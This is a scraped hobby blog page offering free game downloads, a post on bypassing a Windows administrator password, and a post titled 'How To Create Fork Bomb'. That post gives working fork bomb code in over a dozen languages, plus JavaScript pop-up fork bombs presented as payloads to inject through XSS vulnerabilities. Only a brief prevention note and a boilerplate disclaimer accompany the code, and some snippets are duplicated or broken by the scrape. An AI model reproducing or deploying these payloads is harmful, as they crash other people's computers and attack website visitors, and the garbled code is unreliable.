Get Your PC Games With 100% Working Link.
Download Free Games. The Games Posted On The Blog Are Tested And Have 100% Working Link.
Download Video Editing Softwares And Game Related Softwares.
Video Editing Softwares Like Sony Vegas And Game Related Softwares Like Direct X.
Full Collection Of Spiderman Games For PC In One Pack.
Thorugh The Author Of The Blog You Get A Full Collection Of Spiderman Games For PC Which Are Tested And HAve 100% Working Link.
Learn Tricks Like Wifi Hacking.
The Author Is Not Responsible For Any Kind Of Misuse Of The Information Provided.
Full Collection OF Latest Game Series.
Get Full Collection OF Latest Game Series Which Include Grand Theft Auto, Assassisn's Creed, WWE, Spidderman And Farcry Games.
Monday, 30 May 2016
How to Hack Windows Administrator Password
23:58:00
No comments
You can do this with a small tool called Offline NT Password & Registry Editor. This utility works offline, that means you need to shut down and boot off your computer using a floppy disk, CD or USB device (such as pen drive). The tool has the following features:
How To Create Fork Bomb
23:42:00
No comments
Think about, just 5 characters long virus equivalent of a Denial-Of-Service attack on any computer system. Which aims at depriving the system off its RAM, leaving none for vital functions required to keep the systems running, hence crashing it. Fork Bomb is not just deadly to a computer but it’s also annoying.
What Is Fork Bomb ??
Fork Bomb (aka Rabbit Virus or Wabbit) is a Denial-Of-Service attack wherein a process continually replicates itself to deplete available system resources, slowing down or crashing the system due to resource starvation.
How About Virus Doubling Itself !!
Virus doubling itself is a form of exponential growth.
- After a single iteration of the loop, two viruses are created.
- After another cycle, each of those two creates another two for a total of four same virus.
- After 10 iterations we’ll have 2^10 = 1024 virus.
- After 100 iterations we have 2^100 = 1.267 Nonillion, that’s a number so big you don’t even know what ‘Nonillion’ is (It’s 10^30).
Even with today’s CPUs and RAMs, being in the Tera Range (THz and Tb), the virus will probably not even complete 50 iterations before running out of memory. Remember, every iteration would hardly take a few milliseconds, so running this virus will almost definitely crash your computer.
Concept Behind Fork Bomb
Creation of a function that calls itself twice every call and doesn’t have any way to terminate itself. It will keep doubling up until you run out of system resources.
Coding Fork Bomb In Different Programming Languages
1# Fork Bomb using the Bash shell:
:(){ :|:& };:
Where,
:() means you are defining a function called :
{:|: &} means run the function : and send its output to the : function again and run that in the background.
The ; is a command separator, like &&.
: runs the function the first time.
:() means you are defining a function called :
{:|: &} means run the function : and send its output to the : function again and run that in the background.
The ; is a command separator, like &&.
: runs the function the first time.
2# Encoding in a standalone shell script as opposed to a shell function:
#!/bin/bash
./$0|./$0& #”$0″ returns the name of the shell script itself
3# Fork Bomb using the Microsoft Windows batch language:
:s
start “” %0
goto s
start “” %0
goto s
The same as above, but shorter:
%0|%0
%0|%0
4# Fork Bomb using inline shell of Perl interpreter:
perl -e “fork while fork” &
5# Fork Bomb Using Python:
import os
while 1:
os.fork()
while 1:
os.fork()
6# Fork Bomb Using Ruby:
loop { fork { load(__FILE__) } }
7# Fork Bomb using Haskell:
import Control.Monad (forever)
import System.Posix.Process (forkProcess)
import System.Posix.Process (forkProcess)
forkBomb = forever $ forkProcess forkBomb
main = forkBomb
8# Fork Bomb using Common Lisp (Clozure CL):
(loop (#_fork))
9# Fork Bomb using C:
#include <unistd.h>
int main(void)
{
while(1) fork();
}
{
while(1) fork();
}
10# Fork Bomb using Assembly:
section .text
global_start
global_start
_start:
mov eax,2 ;System call for forking
int 0x80 ;Call kernel
jmp _start
mov eax,2 ;System call for forking
int 0x80 ;Call kernel
jmp _start
Fork Bomb In .NET using C#:
static void Main()
{
while (true) Process.Start(Assembly.GetExecutingAssembly().Location);
}
static void Main()
{
while (true) Process.Start(Assembly.GetExecutingAssembly().Location);
}
11# Fork Bomb using VB.net:
Do
System.Diagnostics.Process.Start(System.Reflection.Assembly.GetExecutingAssembly().Location)
Loop While True
System.Diagnostics.Process.Start(System.Reflection.Assembly.GetExecutingAssembly().Location)
Loop While True
12# Fork Bomb using JavaScript code that can be injected into a Web page via an XSS vulnerability exploit, resulting in a series of infinitely forking pop-up windows:
<script>
while (true) {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}
</script>
while (true) {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}
</script>
Or, an easier-to-inject, harder-to-censor version of the above that uses an event spoofing attack:
<a href=”#” onload=”function() { while (true) { var w = window.open(); w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML); } }”>XSS fork bomb</a>
Or, a more aggressive version:
<script>
setInterval(function() {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}, 10);
</script>
setInterval(function() {
var w = window.open();
w.document.write(document.documentElement.outerHTML||document.documentElement.innerHTML);
}, 10);
</script>
Prevention
As a Fork Bomb’s mode of operation is entirely encapsulated by creating new processes, one way of preventing a fork bomb from severely affecting the entire system is to limit the maximum number of processes that a single user may own.
- On Linux, this can be achieved by using the ulimit utility; for example, the command ulimit –u 30 would limit the affected user to a maximum of thirty owned processes.
- On PAM (Pluggable Authentication Module) enabled systems, this limit can also be set in /etc/security/limits.conf.
- On FreeBSD, the system administrator can put limits in /etc/login.conf.
Disclaimer: This tutorial is only for educational purpose. The author or the blog owner is not responsible for any kind of misuse of this information provided.
Prototype 2
07:24:00
3 comments
Minimum System Requirements
OS - Windows® XP / Vista / 7
Processor - Intel Core 2 Duo 2.6GHz, AMD Phenom X3 8750
Memory - 2 GB RAM
Video Card - NVIDIA GeForce 8800 GT with 512 MB RAM, ATI Radeon HD 4850 with 512 MB RAM
DirectX Version - 9.0C or later
Disk space - 10 GB
Sound Card - Any DirectX 9 compatible Sound Card
Recommended System Requirements
OS - Windows 7
Processor - Intel Core 2 Quad 2.7 GHz or better, AMD Phenom II X4 3 GHz or better
Memory - 4 GB
Video Card - NVIDIA GeForce GTX 460 (1GB) or better, ATI Radeon HD 5850 (1GB) or better
DirectX Version - 9.0C or later
Disk space - 10 GB
Sound Card - Any DirectX 9 compatible Sound Card
Download The Game Here
Subscribe to:
Posts (Atom)